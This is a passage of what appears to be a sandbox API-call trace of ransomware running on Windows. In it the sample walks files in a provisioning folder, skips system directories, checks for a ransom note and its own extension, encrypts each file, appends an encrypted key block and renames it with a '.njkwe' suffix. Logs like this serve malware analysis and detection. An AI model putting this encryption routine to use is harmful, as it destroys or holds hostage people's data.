(lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\543__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.919] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\543__Connections_Cellular_Orange (Guinea)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\543__connections_cellular_orange (guinea)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.919] GetTickCount () returned 0x1154c96 [0081.919] GetTickCount () returned 0x1154c96 [0081.919] GetTickCount () returned 0x1154c96 [0081.919] GetTickCount () returned 0x1154c96 [0081.919] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.920] GetProcessHeap () returned 0xbe0000 [0081.920] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.920] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2ca, lpOverlapped=0x0) returned 1 [0081.924] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd36, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.924] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2ca, lpOverlapped=0x0) returned 1 [0081.924] GetProcessHeap () returned 0xbe0000 [0081.924] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.924] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.924] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.924] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.924] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.924] CloseHandle (hObject=0x444) returned 1 [0081.925] GetProcessHeap () returned 0xbe0000 [0081.925] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.925] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\543__Connections_Cellular_Orange (Guinea)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0081.925] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\543__Connections_Cellular_Orange (Guinea)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\543__connections_cellular_orange (guinea)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\543__Connections_Cellular_Orange (Guinea)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\543__connections_cellular_orange (guinea)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.925] GetProcessHeap () returned 0xbe0000 [0081.925] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.925] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9136b55d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9136b55d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9136b55d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="544__Connections_Cellular_Orange (Guinea-Bissau)_i0$(__MVID)@WAP.provxml", cAlternateFileName="544__C~1.PRO")) returned 1 [0081.925] lstrcmpiW (lpString1="544__Connections_Cellular_Orange (Guinea-Bissau)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.925] lstrcmpiW (lpString1="544__Connections_Cellular_Orange (Guinea-Bissau)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.926] lstrcmpiW (lpString1="544__Connections_Cellular_Orange (Guinea-Bissau)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.926] lstrcmpiW (lpString1="544__Connections_Cellular_Orange (Guinea-Bissau)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.926] lstrcmpiW (lpString1="544__Connections_Cellular_Orange (Guinea-Bissau)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.926] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\544__Connections_Cellular_Orange (Guinea-Bissau)_i0$(__MVID)@WAP.provxml") returned 166 [0081.926] StrStrIW (lpFirst="544__Connections_Cellular_Orange (Guinea-Bissau)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.926] lstrcmpW (lpString1="544__Connections_Cellular_Orange (Guinea-Bissau)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.926] lstrcmpW (lpString1="544__Connections_Cellular_Orange (Guinea-Bissau)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.926] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\544__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.926] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\544__Connections_Cellular_Orange (Guinea-Bissau)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\544__connections_cellular_orange (guinea-bissau)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.926] GetTickCount () returned 0x1154ca5 [0081.926] GetTickCount () returned 0x1154ca5 [0081.926] GetTickCount () returned 0x1154ca5 [0081.926] GetTickCount () returned 0x1154ca5 [0081.926] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.926] GetProcessHeap () returned 0xbe0000 [0081.926] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.926] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d1, lpOverlapped=0x0) returned 1 [0081.931] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.931] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d1, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d1, lpOverlapped=0x0) returned 1 [0081.932] GetProcessHeap () returned 0xbe0000 [0081.932] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.932] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.932] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.932] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.932] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.932] CloseHandle (hObject=0x444) returned 1 [0081.932] GetProcessHeap () returned 0xbe0000 [0081.932] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.932] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\544__Connections_Cellular_Orange (Guinea-Bissau)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0081.932] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\544__Connections_Cellular_Orange (Guinea-Bissau)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\544__connections_cellular_orange (guinea-bissau)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\544__Connections_Cellular_Orange (Guinea-Bissau)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\544__connections_cellular_orange (guinea-bissau)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.933] GetProcessHeap () returned 0xbe0000 [0081.933] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.933] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x913917c8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x913917c8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x913917c8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x353, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="545__Connections_Cellular_Orange (Côte d’Ivoire)_i0$(__MVID)@WAP.provxml", cAlternateFileName="545__C~1.PRO")) returned 1 [0081.933] lstrcmpiW (lpString1="545__Connections_Cellular_Orange (Côte d’Ivoire)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.933] lstrcmpiW (lpString1="545__Connections_Cellular_Orange (Côte d’Ivoire)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.933] lstrcmpiW (lpString1="545__Connections_Cellular_Orange (Côte d’Ivoire)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.933] lstrcmpiW (lpString1="545__Connections_Cellular_Orange (Côte d’Ivoire)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.933] lstrcmpiW (lpString1="545__Connections_Cellular_Orange (Côte d’Ivoire)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.933] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\545__Connections_Cellular_Orange (Côte d’Ivoire)_i0$(__MVID)@WAP.provxml") returned 166 [0081.933] StrStrIW (lpFirst="545__Connections_Cellular_Orange (Côte d’Ivoire)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.936] lstrcmpW (lpString1="545__Connections_Cellular_Orange (Côte d’Ivoire)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.936] lstrcmpW (lpString1="545__Connections_Cellular_Orange (Côte d’Ivoire)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.936] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\545__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.936] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\545__Connections_Cellular_Orange (Côte d’Ivoire)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\545__connections_cellular_orange (côte d’ivoire)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.937] GetTickCount () returned 0x1154ca5 [0081.937] GetTickCount () returned 0x1154ca5 [0081.937] GetTickCount () returned 0x1154ca5 [0081.937] GetTickCount () returned 0x1154ca5 [0081.937] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.937] GetProcessHeap () returned 0xbe0000 [0081.937] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.937] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x353, lpOverlapped=0x0) returned 1 [0081.978] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffcad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.979] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x353, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x353, lpOverlapped=0x0) returned 1 [0081.979] GetProcessHeap () returned 0xbe0000 [0081.979] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.979] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.979] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.979] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.979] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.979] CloseHandle (hObject=0x444) returned 1 [0081.979] GetProcessHeap () returned 0xbe0000 [0081.979] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.979] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\545__Connections_Cellular_Orange (Côte d’Ivoire)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0081.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\545__Connections_Cellular_Orange (Côte d’Ivoire)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\545__connections_cellular_orange (côte d’ivoire)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\545__Connections_Cellular_Orange (Côte d’Ivoire)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\545__connections_cellular_orange (côte d’ivoire)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.980] GetProcessHeap () returned 0xbe0000 [0081.980] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.980] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x913917c8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x913917c8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x913917c8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x350, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="546__Connections_Cellular_Orange (Côte d’Ivoire)_i1$(__MVID)@WAP.provxml", cAlternateFileName="546__C~1.PRO")) returned 1 [0081.980] lstrcmpiW (lpString1="546__Connections_Cellular_Orange (Côte d’Ivoire)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.980] lstrcmpiW (lpString1="546__Connections_Cellular_Orange (Côte d’Ivoire)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.981] lstrcmpiW (lpString1="546__Connections_Cellular_Orange (Côte d’Ivoire)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.981] lstrcmpiW (lpString1="546__Connections_Cellular_Orange (Côte d’Ivoire)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.981] lstrcmpiW (lpString1="546__Connections_Cellular_Orange (Côte d’Ivoire)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.981] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\546__Connections_Cellular_Orange (Côte d’Ivoire)_i1$(__MVID)@WAP.provxml") returned 166 [0081.981] StrStrIW (lpFirst="546__Connections_Cellular_Orange (Côte d’Ivoire)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.981] lstrcmpW (lpString1="546__Connections_Cellular_Orange (Côte d’Ivoire)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.981] lstrcmpW (lpString1="546__Connections_Cellular_Orange (Côte d’Ivoire)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.981] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\546__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.981] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\546__Connections_Cellular_Orange (Côte d’Ivoire)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\546__connections_cellular_orange (côte d’ivoire)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.981] GetTickCount () returned 0x1154cd4 [0081.981] GetTickCount () returned 0x1154cd4 [0081.981] GetTickCount () returned 0x1154cd4 [0081.981] GetTickCount () returned 0x1154cd4 [0081.981] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.981] GetProcessHeap () returned 0xbe0000 [0081.981] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.981] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x350, lpOverlapped=0x0) returned 1 [0081.983] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffcb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.983] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x350, lpOverlapped=0x0) returned 1 [0081.983] GetProcessHeap () returned 0xbe0000 [0081.983] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.983] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.983] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.983] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.983] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.983] CloseHandle (hObject=0x444) returned 1 [0081.984] GetProcessHeap () returned 0xbe0000 [0081.984] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.984] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\546__Connections_Cellular_Orange (Côte d’Ivoire)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0081.984] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\546__Connections_Cellular_Orange (Côte d’Ivoire)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\546__connections_cellular_orange (côte d’ivoire)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\546__Connections_Cellular_Orange (Côte d’Ivoire)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\546__connections_cellular_orange (côte d’ivoire)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.984] GetProcessHeap () returned 0xbe0000 [0081.985] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.985] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x913b7a34, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x913b7a34, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x913b7a34, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x355, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="547__Connections_Cellular_Orange (Côte 